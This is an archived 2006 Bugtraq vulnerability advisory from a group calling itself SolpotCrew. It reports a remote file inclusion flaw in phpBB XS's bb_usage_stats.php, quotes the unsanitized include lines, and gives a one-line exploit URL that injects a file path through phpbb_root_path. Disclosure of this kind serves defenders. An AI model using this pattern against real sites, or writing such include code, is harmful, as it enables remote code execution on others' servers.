Bugtraq mailing list archives

SolpotCrew Advisory #10 - phpBB XS (phpbb_root_path) Remote File Include

From: jong_amq () hotmail com
Date: 15 Sep 2006 15:49:02 -0000

#############################SolpotCrew Community################################
#
#        phpBB XS (phpbb_root_path) Remote File Include
#
#        Download file : http://www.phpbbxs.eu/dload.php?action=category&cat_id=2
#
#################################################################################
#
#
#       Bug Found By : NoGe a.k.a da_jackass 
#
#       contact: jong_amq () hotmail com 
# 
#       Website : http://nyubicrew.org/adv/Noge_adv_02.txt
#
################################################################################
#
#
#      Greetz: skulmatic[thanks for sharing knowledge] h4ntu[for the video] olibekas solpotcrew PremanMedan
#              yooogy[pa bozz] siwa^lima sagu mousekill ilalang13
#              #papmahackerlink #nyubi #maluku-hacker #papuahacker
#              
###############################################################################
# Vulnerable found in bb_usage_stats.php 

line 24 include($phpbb_root_path . 'bb_usage_stats/includes/bb_usage_stats_constants.' . $phpEx); 
line 25 include($phpbb_root_path . 'bb_usage_stats/language/lang_' . $board_config['default_lang'] . 
'/bb_usage_stats_lang.' . $phpEx); 
line 26 include($phpbb_root_path . 'bb_usage_stats/includes/bb_usage_stats_functions.' . $phpEx); 


# Exploit 

http://victim.com/[path]/bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=[evilcode] 

######################################E.O.F##################################

Current thread:

SolpotCrew Advisory #10 - phpBB XS (phpbb_root_path) Remote File Include jong_amq (Sep 15)